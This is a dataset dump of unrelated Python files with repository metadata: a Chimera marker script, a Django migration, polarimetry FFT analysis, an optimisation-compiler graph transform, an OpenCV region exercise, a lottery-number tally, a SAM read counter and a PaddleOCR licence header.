mark=s.place_marker((420.392, 453.434, 469.096), (0.6, 0.31, 0.64), 17.1475)
if "Sec5_GFPC" not in marker_sets:
s=new_marker_set('Sec5_GFPC')
marker_sets["Sec5_GFPC"]=s
s= marker_sets["Sec5_GFPC"]
mark=s.place_marker((399.085, 485.531, 510.933), (0.7, 0.4, 0.7), 18.4716)
if "Sec6_GFPN" not in marker_sets:
s=new_marker_set('Sec6_GFPN')
marker_sets["Sec6_GFPN"]=s
s= marker_sets["Sec6_GFPN"]
mark=s.place_marker((475.139, 500.646, 549.303), (1, 1, 0), 18.4716)
if "Sec6_0" not in marker_sets:
s=new_marker_set('Sec6_0')
marker_sets["Sec6_0"]=s
s= marker_sets["Sec6_0"]
mark=s.place_marker((473.842, 501.535, 515.465), (1, 1, 0.2), 17.1475)
if "Sec6_1" not in marker_sets:
s=new_marker_set('Sec6_1')
marker_sets["Sec6_1"]=s
s= marker_sets["Sec6_1"]
mark=s.place_marker((471.393, 503.713, 480.236), (1, 1, 0.2), 17.1475)
if "Sec6_2" not in marker_sets:
s=new_marker_set('Sec6_2')
marker_sets["Sec6_2"]=s
s= marker_sets["Sec6_2"]
mark=s.place_marker((469.173, 505.958, 444.987), (1, 1, 0.2), 17.1475)
if "Sec6_3" not in marker_sets:
s=new_marker_set('Sec6_3')
marker_sets["Sec6_3"]=s
s= marker_sets["Sec6_3"]
mark=s.place_marker((465.797, 510.556, 410.791), (1, 1, 0.2), 17.1475)
if "Sec6_4" not in marker_sets:
s=new_marker_set('Sec6_4')
marker_sets["Sec6_4"]=s
s= marker_sets["Sec6_4"]
mark=s.place_marker((457.751, 514.986, 376.788), (1, 1, 0.2), 17.1475)
if "Sec6_5" not in marker_sets:
s=new_marker_set('Sec6_5')
marker_sets["Sec6_5"]=s
s= marker_sets["Sec6_5"]
mark=s.place_marker((448.092, 524.266, 344.564), (1, 1, 0.2), 17.1475)
if "Sec6_GFPC" not in marker_sets:
s=new_marker_set('Sec6_GFPC')
marker_sets["Sec6_GFPC"]=s
s= marker_sets["Sec6_GFPC"]
mark=s.place_marker((463.163, 448.151, 366.263), (1, 1, 0.4), 18.4716)
if "Sec6_Anch" not in marker_sets:
s=new_marker_set('Sec6_Anch')
marker_sets["Sec6_Anch"]=s
s= marker_sets["Sec6_Anch"]
mark=s.place_marker((423.358, 589.653, 280.3), (1, 1, 0.4), 18.4716)
if "Sec8_0" not in marker_sets:
s=new_marker_set('Sec8_0')
marker_sets["Sec8_0"]=s
s= marker_sets["Sec8_0"]
mark=s.place_marker((480.18, 468.774, 523.834), (0.65, 0.34, 0.16), 17.1475)
if "Sec8_1" not in marker_sets:
s=new_marker_set('Sec8_1')
marker_sets["Sec8_1"]=s
s= marker_sets["Sec8_1"]
mark=s.place_marker((487.445, 444.866, 510.895), (0.65, 0.34, 0.16), 17.1475)
if "Sec8_2" not in marker_sets:
s=new_marker_set('Sec8_2')
marker_sets["Sec8_2"]=s
s= marker_sets["Sec8_2"]
mark=s.place_marker((481.161, 432.139, 486.605), (0.65, 0.34, 0.16), 17.1475)
if "Sec8_3" not in marker_sets:
s=new_marker_set('Sec8_3')
marker_sets["Sec8_3"]=s
s= marker_sets["Sec8_3"]
mark=s.place_marker((461.135, 417.823, 472.99), (0.65, 0.34, 0.16), 17.1475)
if "Sec8_4" not in marker_sets:
s=new_marker_set('Sec8_4')
marker_sets["Sec8_4"]=s
s= marker_sets["Sec8_4"]
mark=s.place_marker((444.593, 395.163, 470.991), (0.65, 0.34, 0.16), 17.1475)
if "Sec8_5" not in marker_sets:
s=new_marker_set('Sec8_5')
marker_sets["Sec8_5"]=s
s= marker_sets["Sec8_5"]
mark=s.place_marker((427.718, 373.776, 477.992), (0.65, 0.34, 0.16), 17.1475)
if "Sec8_GFPC" not in marker_sets:
s=new_marker_set('Sec8_GFPC')
marker_sets["Sec8_GFPC"]=s
s= marker_sets["Sec8_GFPC"]
mark=s.place_marker((397.481, 435.285, 396.787), (0.7, 0.4, 0), 18.4716)
if "Sec8_Anch" not in marker_sets:
s=new_marker_set('Sec8_Anch')
marker_sets["Sec8_Anch"]=s
s= marker_sets["Sec8_Anch"]
mark=s.place_marker((457.766, 312.114, 559.189), (0.7, 0.4, 0), 18.4716)
if "Sec10_GFPN" not in marker_sets:
s=new_marker_set('Sec10_GFPN')
marker_sets["Sec10_GFPN"]=s
s= marker_sets["Sec10_GFPN"]
mark=s.place_marker((461.37, 459.603, 334.456), (0.2, 0.6, 0.2), 18.4716)
if "Sec10_0" not in marker_sets:
s=new_marker_set('Sec10_0')
marker_sets["Sec10_0"]=s
s= marker_sets["Sec10_0"]
mark=s.place_marker((457.816, 452.49, 338.973), (0.3, 0.69, 0.29), 17.1475)
if "Sec10_1" not in marker_sets:
s=new_marker_set('Sec10_1')
marker_sets["Sec10_1"]=s
s= marker_sets["Sec10_1"]
mark=s.place_marker((450.763, 440.282, 363.278), (0.3, 0.69, 0.29), 17.1475)
if "Sec10_2" not in marker_sets:
s=new_marker_set('Sec10_2')
marker_sets["Sec10_2"]=s
s= marker_sets["Sec10_2"]
mark=s.place_marker((429.657, 434.382, 380.863), (0.3, 0.69, 0.29), 17.1475)
if "Sec10_3" not in marker_sets:
s=new_marker_set('Sec10_3')
marker_sets["Sec10_3"]=s
s= marker_sets["Sec10_3"]
mark=s.place_marker((420.544, 466.002, 377.307), (0.3, 0.69, 0.29), 17.1475)
if "Sec10_4" not in marker_sets:
s=new_marker_set('Sec10_4')
marker_sets["Sec10_4"]=s
s= marker_sets["Sec10_4"]
mark=s.place_marker((424.041, 490.581, 390.47), (0.3, 0.69, 0.29), 17.1475)
if "Sec10_5" not in marker_sets:
s=new_marker_set('Sec10_5')
marker_sets["Sec10_5"]=s
s= marker_sets["Sec10_5"]
mark=s.place_marker((432.871, 509.758, 409.014), (0.3, 0.69, 0.29), 17.1475)
if "Sec10_GFPC" not in marker_sets:
s=new_marker_set('Sec10_GFPC')
marker_sets["Sec10_GFPC"]=s
s= marker_sets["Sec10_GFPC"]
mark=s.place_marker((321.464, 463.925, 491.214), (0.4, 0.75, 0.3), 18.4716)
if "Sec10_Anch" not in marker_sets:
s=new_marker_set('Sec10_Anch')
marker_sets["Sec10_Anch"]=s
s= marker_sets["Sec10_Anch"]
mark=s.place_marker((549.906, 554.619, 331.935), (0.4, 0.75, 0.3), 18.4716)
if "Sec15_GFPN" not in marker_sets:
s=new_marker_set('Sec15_GFPN')
marker_sets["Sec15_GFPN"]=s
s= marker_sets["Sec15_GFPN"]
mark=s.place_marker((420.639, 516.57, 430.707), (0.9, 0.5, 0.7), 18.4716)
if "Sec15_0" not in marker_sets:
s=new_marker_set('Sec15_0')
marker_sets["Sec15_0"]=s
s= marker_sets["Sec15_0"]
mark=s.place_marker((406.95, 510.81, 430.868), (0.97, 0.51, 0.75), 17.1475)
if "Sec15_1" not in marker_sets:
s=new_marker_set('Sec15_1')
marker_sets["Sec15_1"]=s
s= marker_sets["Sec15_1"]
mark=s.place_marker((394.493, 485.949, 434.907), (0.97, 0.51, 0.75), 17.1475)
if "Sec15_2" not in marker_sets:
s=new_marker_set('Sec15_2')
marker_sets["Sec15_2"]=s
s= marker_sets["Sec15_2"]
mark=s.place_marker((370.021, 481.2, 421.942), (0.97, 0.51, 0.75), 17.1475)
if "Sec15_3" not in marker_sets:
s=new_marker_set('Sec15_3')
marker_sets["Sec15_3"]=s
s= marker_sets["Sec15_3"]
mark=s.place_marker((348.838, 486.442, 404.24), (0.97, 0.51, 0.75), 17.1475)
if "Sec15_4" not in marker_sets:
s=new_marker_set('Sec15_4')
marker_sets["Sec15_4"]=s
s= marker_sets["Sec15_4"]
mark=s.place_marker((326.826, 495.014, 389.026), (0.97, 0.51, 0.75), 17.1475)
if "Sec15_5" not in marker_sets:
s=new_marker_set('Sec15_5')
marker_sets["Sec15_5"]=s
s= marker_sets["Sec15_5"]
mark=s.place_marker((312.231, 484.269, 367.553), (0.97, 0.51, 0.75), 17.1475)
if "Sec15_GFPC" not in marker_sets:
s=new_marker_set('Sec15_GFPC')
marker_sets["Sec15_GFPC"]=s
s= marker_sets["Sec15_GFPC"]
mark=s.place_marker((361.302, 417.406, 366.31), (1, 0.6, 0.8), 18.4716)
if "Sec15_Anch" not in marker_sets:
s=new_marker_set('Sec15_Anch')
marker_sets["Sec15_Anch"]=s
s= marker_sets["Sec15_Anch"]
mark=s.place_marker((263.159, 551.133, 368.797), (1, 0.6, 0.8), 18.4716)
if "Exo70_GFPN" not in marker_sets:
s=new_marker_set('Exo70_GFPN')
marker_sets["Exo70_GFPN"]=s
s= marker_sets["Exo70_GFPN"]
mark=s.place_marker((414.232, 529.538, 502.19), (0.8, 0, 0), 18.4716)
if "Exo70_0" not in marker_sets:
s=new_marker_set('Exo70_0')
marker_sets["Exo70_0"]=s
s= marker_sets["Exo70_0"]
mark=s.place_marker((421.218, 538.508, 491.876), (0.89, 0.1, 0.1), 17.1475)
if "Exo70_1" not in marker_sets:
s=new_marker_set('Exo70_1')
marker_sets["Exo70_1"]=s
s= marker_sets["Exo70_1"]
mark=s.place_marker((434.76, 555.312, 472.908), (0.89, 0.1, 0.1), 17.1475)
if "Exo70_2" not in marker_sets:
s=new_marker_set('Exo70_2')
marker_sets["Exo70_2"]=s
s= marker_sets["Exo70_2"]
mark=s.place_marker((441.382, 555.571, 444.877), (0.89, 0.1, 0.1), 17.1475)
if "Exo70_3" not in marker_sets:
s=new_marker_set('Exo70_3')
marker_sets["Exo70_3"]=s
s= marker_sets["Exo70_3"]
mark=s.place_marker((444.866, 549.75, 416.966), (0.89, 0.1, 0.1), 17.1475)
if "Exo70_4" not in marker_sets:
s=new_marker_set('Exo70_4')
marker_sets["Exo70_4"]=s
s= marker_sets["Exo70_4"]
mark=s.place_marker((448.336, 543.908, 389.047), (0.89, 0.1, 0.1), 17.1475)
if "Exo70_GFPC" not in marker_sets:
s=new_marker_set('Exo70_GFPC')
marker_sets["Exo70_GFPC"]=s
s= marker_sets["Exo70_GFPC"]
mark=s.place_marker((395.034, 379.324, 364.988), (1, 0.2, 0.2), 18.4716)
if "Exo70_Anch" not in marker_sets:
s=new_marker_set('Exo70_Anch')
marker_sets["Exo70_Anch"]=s
s= marker_sets["Exo70_Anch"]
mark=s.place_marker((509.963, 703.963, 400.71), (1, 0.2, 0.2), 18.4716)
if "Exo84_GFPN" not in marker_sets:
s=new_marker_set('Exo84_GFPN')
marker_sets["Exo84_GFPN"]=s
s= marker_sets["Exo84_GFPN"]
mark=s.place_marker((484.167, 529.899, 466.221), (0.9, 0.4, 0), 18.4716)
if "Exo84_0" not in marker_sets:
s=new_marker_set('Exo84_0')
marker_sets["Exo84_0"]=s
s= marker_sets["Exo84_0"]
mark=s.place_marker((456.915, 531.184, 463.224), (1, 0.5, 0), 17.1475)
if "Exo84_1" not in marker_sets:
s=new_marker_set('Exo84_1')
marker_sets["Exo84_1"]=s
s= marker_sets["Exo84_1"]
mark=s.place_marker((419.117, 531.73, 454.695), (1, 0.5, 0), 17.1475)
if "Exo84_2" not in marker_sets:
s=new_marker_set('Exo84_2')
marker_sets["Exo84_2"]=s
s= marker_sets["Exo84_2"]
mark=s.place_marker((382.083, 534.83, 446.189), (1, 0.5, 0), 17.1475)
if "Exo84_3" not in marker_sets:
s=new_marker_set('Exo84_3')
marker_sets["Exo84_3"]=s
s= marker_sets["Exo84_3"]
mark=s.place_marker((350.763, 537.456, 439.006), (1, 0.5, 0), 17.1475)
if "Exo84_GFPC" not in marker_sets:
s=new_marker_set('Exo84_GFPC')
marker_sets["Exo84_GFPC"]=s
s= marker_sets["Exo84_GFPC"]
mark=s.place_marker((381.405, 457.09, 488.981), (1, 0.6, 0.1), 18.4716)
if "Exo84_Anch" not in marker_sets:
s=new_marker_set('Exo84_Anch')
marker_sets["Exo84_Anch"]=s
s= marker_sets["Exo84_Anch"]
mark=s.place_marker((292.706, 611.017, 387.815), (1, 0.6, 0.1), 18.4716)
for k in surf_sets.keys():
chimera.openModels.add([surf_sets[k]])
| [
"[email protected]"
] | |
1bce63e3d413d22d5c4e516e69f4256bfee33379 | cd41fbf35cc3205b5bfad83702d95ec7b575d5c8 | /kilogram_app/mysite/kilogram/migrations/0001_initial.py | c86b9550467cb1e262952d586a25967c7a244929 | [] | no_license | devnunu/django-study | 3779ed23f70ec0e689252a634dd745c88e173e78 | 0e0b29926a9bf5063166079dd8232a51a9154256 | refs/heads/master | 2021-03-27T09:49:23.760190 | 2017-07-03T06:37:23 | 2017-07-03T06:37:23 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,048 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.2 on 2017-06-27 11:42
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import kilogram.models
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Photo',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('image', models.ImageField(upload_to=kilogram.models.user_path)),
('thumbnail', models.ImageField(upload_to=b'')),
('comment', models.CharField(max_length=255)),
('pub_date', models.DateTimeField(auto_now_add=True)),
('owner', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
| [
"[email protected]"
] | |
bb8545a3b2263351f5c717ce6b6836f8d18e1faf | d424e2443711fe32406124dc3d2bdfe099ba7bc6 | /polarimetry.py | 5ec2124e01b13e85f4ce1b04f00e17b496343b89 | [] | no_license | ptweir/flypod | 110fcbdbfd7c3725f7c2fc5048427a7f7469ce18 | 1f049d2728ee519430fedb6734f094d18887a7f2 | refs/heads/master | 2021-01-23T05:39:14.599436 | 2012-01-09T18:55:37 | 2012-01-09T18:55:37 | 418,820 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,866 | py | import numpy as np
import motmot.FlyMovieFormat.FlyMovieFormat as FMF
import colormapTools as cmt
import pylab
import sys, os, time
from scipy.stats.morestats import circmean
from scipy.signal import sepfir2d, gaussian #, convolve2d
def show_angle(angle,power):
ARROW_STEP = 40
kernel = np.ones((ARROW_STEP,ARROW_STEP))
rowFilter = gaussian(ARROW_STEP,ARROW_STEP/5)
colFilter = rowFilter
gb180 = cmt.get_cmap('gb180')
#X = np.arange(0,angle.shape(-1),ARROW_STEP)
#Y = np.arange(0,angle.shape(-2),ARROW_STEP)
x = np.matrix(np.arange(ARROW_STEP/2,angle.shape[-1],ARROW_STEP))
y = np.transpose(np.matrix(np.arange(ARROW_STEP/2,angle.shape[-2],ARROW_STEP)))
X = np.array((0*y+1)*x)
Y = np.array(y*(0*x+1))
#u = convolve2d(sin(angle),kernel,mode='same')
#v = convolve2d(cos(angle),kernel,mode='same')
#p = convolve2d(power,kernel,mode='same')
u = sepfir2d(np.sin(angle),rowFilter,colFilter)
v = sepfir2d(np.cos(angle),rowFilter,colFilter)
p = sepfir2d(power,rowFilter,colFilter)
U = u[ARROW_STEP/2::ARROW_STEP,ARROW_STEP/2::ARROW_STEP]*p[ARROW_STEP/2::ARROW_STEP,ARROW_STEP/2::ARROW_STEP]
V = v[ARROW_STEP/2::ARROW_STEP,ARROW_STEP/2::ARROW_STEP]*p[ARROW_STEP/2::ARROW_STEP,ARROW_STEP/2::ARROW_STEP]
#U = sin(angle[ARROW_STEP/2::ARROW_STEP,ARROW_STEP/2::ARROW_STEP])*(power[ARROW_STEP/2::ARROW_STEP,ARROW_STEP/2::ARROW_STEP])
#V = cos(angle[ARROW_STEP/2::ARROW_STEP,ARROW_STEP/2::ARROW_STEP])*(power[ARROW_STEP/2::ARROW_STEP,ARROW_STEP/2::ARROW_STEP])
#X = X[(power[::ARROW_STEP,::ARROW_STEP]>.016)]
#Y = Y[(power[::ARROW_STEP,::ARROW_STEP]>.016)]
#U = U[(power[::ARROW_STEP,::ARROW_STEP]>.016)]
#V = V[(power[::ARROW_STEP,::ARROW_STEP]>.016)]
ua = ARROW_STEP/1.5*np.nansum(np.sin(angle)*power)/np.nansum(power)
va = -ARROW_STEP/1.5*np.nansum(np.cos(angle)*power)/np.nansum(power)
xc, yc = angle.shape[-1]/2, angle.shape[-2]/2
pylab.imshow(angle,cmap=gb180)
#pylab.imshow(angle,cmap='hsv')
pylab.quiver(X,Y,U,V,pivot='middle',color='w',headwidth=1,headlength=0)
pylab.arrow(xc,yc,ua,va,color='w',linewidth=2)
pylab.arrow(xc,yc,-ua,-va,color='w',linewidth=2)
ax=pylab.gca()
ax.set_axis_off()
pylab.show()
A = np.arctan2(-ua,va)
return A
def do_fft(pixels,time=None):
data = pixels
if time is None:
        t = np.arange(data.shape[-1])
else:
t = time
    d = np.median(np.diff(t))  # use t: np.diff(None) would crash when no time vector is given
rsp = np.fft.rfft(data)
fp = np.fft.fftfreq(data.shape[-1],d)
fpp = fp[fp>=0]
freq = np.empty(rsp.shape[-1])
freq[:fpp.shape[-1]] = fpp
if fp.shape[-1] != rsp.shape[-1]:
freq[-1] = -np.min(fp)
amp = np.abs(rsp)
pwr = amp**2
phs = np.angle(rsp) # something is wrong here
#phs = np.arctan2(rsp.real,rsp.imag)
ind = np.argmax(pwr*(freq!=0),axis=2)
i = np.median(ind)
#i=9
print i, freq[i]
s = np.sum(pwr,axis=2)
power = pwr[:,:,i]/s
phase = phs[:,:,i]
return power, phase
def do_polarimetry(fmf,firstFrame=0,nFrames=500):
PLOTPIX = False
if PLOTPIX is True:
fig = pylab.figure()
fig.hold('on')
if fmf.get_n_frames() < nFrames+firstFrame:
nFrames = fmf.get_n_frames()-firstFrame
print "fmf only has " + str(fmf.get_n_frames()) + " frames"
frame,timestamp = fmf.get_frame(firstFrame)
N = 3
Nx = N
Ny = N
LEFT = 120
RIGHT = 600
TOP = 0
BOTTOM = frame.shape[-2]
#X = np.round(np.linspace(0,frame.shape[-1],Nx+1))
X = np.round(np.linspace(LEFT,RIGHT,Nx+1))
Y = np.round(np.linspace(TOP,BOTTOM,Ny+1))
power = np.empty(frame.shape)
power.fill(np.nan)
phase = np.empty(frame.shape)
phase.fill(np.nan)
intensity = np.empty(frame.shape)
intensity.fill(np.nan)
for i,x in enumerate(X[:-1]):
for j,y in enumerate(Y[:-1]):
ROIFrames = np.empty([Y[j+1]-y,X[i+1]-x,nFrames])
timestamps = np.empty(nFrames)
for frameNumber in range(nFrames):
frame,timestamps[frameNumber] = fmf.get_frame(frameNumber+firstFrame) # start at firstFrame
ROIFrames[:,:,frameNumber] = frame[y:Y[j+1],x:X[i+1]]
power[y:Y[j+1],x:X[i+1]], phase[y:Y[j+1],x:X[i+1]] = do_fft(ROIFrames,timestamps)
intensity[y:Y[j+1],x:X[i+1]] = np.mean(ROIFrames,axis = 2)
if PLOTPIX is True:
pylab.figure(fig.number)
fig.hold('on')
pylab.plot(timestamps,ROIFrames[0,0,:], label='p=' + str(power[y,x])[:4] + ' a=' + str(phase[y,x]*180/np.pi)[:4])
pylab.legend()
pylab.show()
pylab.draw()
power = power[Y[0]:Y[-1],X[0]:X[-1]] # not checked
phase = phase[Y[0]:Y[-1],X[0]:X[-1]]
intensity = intensity[Y[0]:Y[-1],X[0]:X[-1]]
return power, phase, intensity
def compare_file_times(fn1, fn2):
t1, t2 = int(fn1[4:12]+fn1[13:19]),int(fn2[4:12]+fn2[13:19])
return cmp(t1,t2)
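# NOTE: cmp() exists only on Python 2; on Python 3, sort with
# key=lambda fn: int(fn[4:12]+fn[13:19]) or wrap this via functools.cmp_to_key.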
def analyze_file(sky,fname=None):
"""
example:
power,angle,intensity=polarimetry.analyze_file(sky)
"""
WAIT_TIME = 20 #seconds after changeTimes to start polarimetry
ROT180 = True #because camera returns rotated image
if fname is None:
fileName = sky['fileName']
else:
fileName = fname
dirName = sky['dirName']
N = len(sky['changeTimes'][:-1])
fmf = FMF.FlyMovie(os.path.join(dirName,fileName))
frame,timestamp = fmf.get_frame(0)
    if 'times' not in sky:
timestamps = fmf.get_all_timestamps()
else:
timestamps = sky['times']
for i, startTime in enumerate(sky['changeTimes'][:-1]):
startInd = np.argmin(abs(startTime + WAIT_TIME - timestamps))
sys.stdout.write(time.ctime(startTime + WAIT_TIME)+'\n')
#sys.stdout.write("%s\n" % (str(i)))
sys.stdout.flush()
pwr, phs, ints = do_polarimetry(fmf,firstFrame=startInd,nFrames=500)
phs = phs - circmean(np.ravel(phs[222:261,222:272]),high=np.pi,low=-np.pi)
ang = phs/2.0 # because phase offset of intensity values is twice angle between overlapping polarizers
if ROT180:
pwr = np.rot90(pwr,2)
ang = np.rot90(ang,2)
ints = np.rot90(ints,2)
"""
trueUpDirection = filename[3]
if trueUpDirection == 'E':
pwr = np.rot90(pwr,1)
ang = np.rot90(ang,1)
ints = np.rot90(ints,1)
ang = ang + np.pi/2
elif trueUpDirection == 'S':
pwr = np.rot90(pwr,2)
ang = np.rot90(ang,2)
ints = np.rot90(ints,2)
ang = ang + np.pi
elif trueUpDirection == 'W':
pwr = np.rot90(pwr,3)
ang = np.rot90(ang,3)
ints = np.rot90(ints,3)
ang = ang + 3*np.pi/2
"""
mask = ints>(np.mean(ints)-.45*np.std(ints)) #hack
mask[100:300,100:300] = True #not sure if central dot (polarizer) should be in or not... if so - threshold should be ~1 std below mean intensity
pwr[~mask] = np.nan
ang[~mask] = np.nan
ang = np.mod(ang+np.pi/2,2*np.pi)-np.pi/2
ang = cmt.add_colordisc(ang,width=71)
#ang = np.mod(ang+np.pi,2*np.pi)-np.pi
ang = np.mod(ang,2*np.pi)
if i==0:
w,h=ang.shape
power = np.empty([w,h,N])
power.fill(np.nan)
angle = np.empty([w,h,N])
angle.fill(np.nan)
intensity = np.empty([w,h,N])
intensity.fill(np.nan)
power[:,:,i],angle[:,:,i],intensity[:,:,i]=pwr,ang,ints
return power, angle, intensity
# File: /python/epopt/compiler/transforms/separate.py (repo: topherconley/epsilon, no license)
"""Analyze the problem in sum-of-prox form and combine/split terms."""
from collections import defaultdict
from epopt import expression
from epopt import tree_format
from epopt.compiler import validate
from epopt.compiler.problem_graph import *
from epopt.compiler.transforms import linear
from epopt.compiler.transforms.transform_util import *
from epopt.proto.epsilon.expression_pb2 import Cone, Expression, ProxFunction, Variable
from epopt.util import *
def replace_var(expr, old_var_id, new_var):
if (expr.expression_type == Expression.VARIABLE and
expr.variable.variable_id == old_var_id):
return new_var
return expression.from_proto(
expr.proto,
[replace_var(arg, old_var_id, new_var) for arg in expr.arg])
def is_least_squares_function(f):
return f.expr.prox_function.prox_function_type in (
ProxFunction.AFFINE,
ProxFunction.CONSTANT,
ProxFunction.SUM_SQUARE,
ProxFunction.ZERO) and not f.expr.prox_function.epigraph
def separate_var(f_var):
variable_id = "separate:%s:%s" % (
f_var.variable, fp_expr(f_var.function.expr))
return Expression(
expression_type=Expression.VARIABLE,
variable=Variable(variable_id=variable_id),
size=f_var.instances[0].size)
def move_equality_indicators(graph):
"""Move certain equality indicators from objective to constraints."""
    # Single prox case, don't move it
if len(graph.nodes(FUNCTION)) == 1:
return
for f in graph.nodes(FUNCTION):
if f.expr.prox_function.prox_function_type == ProxFunction.ZERO:
# Modify it to be an equality constraint
f.expr = expression.indicator(Cone.ZERO, f.expr.arg[0])
f.node_type = CONSTRAINT
def is_prox_friendly_constraint(expr, var_id):
return expr.arg[0].affine_props.linear_maps[var_id].scalar
def has_incompatible_constraints(f, var, graph):
if is_least_squares_function(f):
return False
var_id = var.expr.variable.variable_id
for f in graph.neighbors(var, CONSTRAINT):
if not is_prox_friendly_constraint(f.expr, var_id):
return True
return False
def add_variable_copy(f, var, graph):
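    """Give f a private copy of var, tied back to the original by an
    equality constraint (a consensus-style variable split)."""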
m, n = dims(var.expr)
old_var_id = var.expr.variable.variable_id
new_var_id = "separate:%s:%s" % (old_var_id, f.node_id)
new_var = graph.add_node(
expression.variable(m, n, new_var_id), VARIABLE, new_var_id)
f.expr = replace_var(f.expr, old_var_id, new_var.expr)
graph.remove_edge(f, var)
graph.add_edge(f, new_var)
eq_constr = graph.add_node(linear.transform_expr(
expression.eq_constraint(new_var.expr, var.expr)), CONSTRAINT)
graph.add_edge(eq_constr, new_var)
graph.add_edge(eq_constr, var)
def separate_objective_terms(graph):
for f in graph.nodes(FUNCTION):
for var in graph.neighbors(f, VARIABLE):
if (len(graph.neighbors(var, FUNCTION)) > 1 or
has_incompatible_constraints(f, var, graph)):
add_variable_copy(f, var, graph)
def add_constant_prox(graph):
"""Add f(x) = 0 term for variables only appearing in constraints."""
for var in graph.nodes(VARIABLE):
# Only add constant prox for variables not appearing in objective
if graph.neighbors(var, FUNCTION):
continue
f_expr = expression.prox_function(
ProxFunction(prox_function_type=ProxFunction.CONSTANT), var.expr)
graph.add_edge(graph.add_node(f_expr, FUNCTION), var)
def variables(expr):
if expr.expression_type == Expression.VARIABLE:
yield expr
for arg in expr.arg:
for var in variables(arg):
yield var
def add_function(f_expr, node_type, graph):
var_list = list(variables(f_expr))
# Exclude constant functions
if not var_list:
return
f = graph.add_node(f_expr, node_type)
for var_expr in var_list:
var_id = var_expr.variable.variable_id
graph.add_edge(f, graph.add_node(var_expr, VARIABLE, node_id=var_id))
def build_graph(problem):
graph = ProblemGraph()
for f_expr in problem.objective.arg:
add_function(f_expr, FUNCTION, graph)
for constr_expr in problem.constraint:
add_function(constr_expr, CONSTRAINT, graph)
return graph
GRAPH_TRANSFORMS = [
move_equality_indicators,
separate_objective_terms,
add_constant_prox,
]
def transform_problem(problem, params):
validate.check_sum_of_prox(problem)
graph = build_graph(problem)
if not graph.nodes(VARIABLE):
return problem
for f in GRAPH_TRANSFORMS:
f(graph)
log_debug(
lambda f, graph:
"%s:\n%s" %
(f.__name__,
tree_format.format_problem(graph.problem)),
f, graph)
return graph.problem
# File: /PDI-WORK/PDI /trabalho2.py (repo: samuelamico/samuelamico.github.io, no license)
# Digital Image Processing
# Student: Samuel Amico
# Number: 20180010181
# Exercise 2.1 - bolhas.png
import numpy as np
import cv2
import time
image = cv2.imread('bolhas.png',0)
height, width = image.shape
print("height - y: ",height,"width - x: ",width)
# P1 = top-left & P2 = bottom-right
P1x = int(input("Ponto 1 x - top:"))
P1y = int(input("Ponto 1 y - top:"))
P2x = int(input("Ponto 2 x - bot:"))
P2y = int(input("Ponto 2 y - bot:"))
print("P1 = (",P1x,",",P1y,") ","P2 = (",P2x,",",P2y,")")
if (image is not None):
cv2.imshow("Original", image)
k = cv2.waitKey(0)
cv2.destroyAllWindows()
cv2.rectangle(image,(int(P1x-3),int(P1y-3)),(int(P2x+3),int(P2y+3)),(0,0,0),2)
cv2.imshow("Rec in Image", image)
k = cv2.waitKey(0)
#cv2.imwrite('RecBolha.png',image)
# ROI --> black
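# NumPy images are indexed [row, col] = [y, x], so the y coordinate comes first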
for i in range(P1x,P2x):
    for j in range(P1y,P2y):
        image[j,i] = 0
cv2.imshow("Black ROI", image)
k = cv2.waitKey(0)
#cv2.imwrite('BolhaBlack.png',image)
cv2.destroyAllWindows()
# ROI --> White
for i in range(P1x,P2x):
    for j in range(P1y,P2y):
        image[j,i] = 255
cv2.imshow("White ROI", image)
k = cv2.waitKey(0)
#cv2.imwrite('BolhaWhite.png',image)
cv2.destroyAllWindows()
# File: /case03/Select_Lab_t.py (repo: Jordan1766/Arduino4Py, no license)
# Which number appears most often?
import sqlite3
conn = sqlite3.connect('demo.db')
cursor = conn.cursor()
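# tally how often each ball value 1..39 appears across the stored draws
# (columns n1..n5 hold the five drawn numbers of each row)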
counts = {}
for i in range(1, 40):
    counts[i] = 0
# query the data rows
sql = 'SELECT id, n1, n2, n3, n4, n5, ts FROM Lotto'
cursor.execute(sql)
rows = cursor.fetchall()
for r in rows:
    for i in range(1, 6):
        counts[r[i]] += 1
maxValue = max(counts.values())
print("max:", maxValue)
for k, v in counts.items():
    if v == maxValue:
        print("%d(%d)" % (k, maxValue))
cursor.close()
# File: /mapped_count.py (repo: natalie-23-gill/QAA, no license)
#!/usr/bin/env python
import argparse
#Get required variables
parser = argparse.ArgumentParser(description="Count mapped and unmapped reads in an aligned SAM file")
parser.add_argument("-f", "--filename", help="Name of input SAM file", required=True)
parser.add_argument("-o", "--output_filename", help="Name of output summary file", required=True)
args = parser.parse_args()
file_name=str(args.filename)
output_filename =str(args.output_filename)
file = open(file_name,"r")
out_file = open(output_filename, "x")
mapped_counter=0
unmapped_counter=0
lc=0
while True:
line = file.readline().strip()
if line == "":
break
    if not line.startswith("@"):  # skip SAM header lines
lc+=1
line_items =line.split()
bit_flag = line_items[1]
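        # SAM FLAG bits: 0x4 (4) = read unmapped, 0x100 (256) = secondary alignment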
if (int(bit_flag) & 4) !=4 and (int(bit_flag) & 256) !=256: #is it mapped?
mapped_counter+=1
else:
if (int(bit_flag) & 256) !=256:
unmapped_counter+=1
#write out results
out_file.write(file_name+"\n")
out_file.write("Number of mapped reads: " + str(mapped_counter) +"\n")
out_file.write("Number of unmapped reads: " + str(unmapped_counter)+"\n")
out_file.write("Number of reads: " + str(mapped_counter+unmapped_counter)+"\n")
out_file.write("Number of lines: " + str(lc)+"\n")
out_file.close()
file.close()
# File: /ppocr/utils/e2e_metric/Deteval.py (repo: limpidezza/PaddleOCR, Apache-2.0)
# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy as np
import scipy.io as io
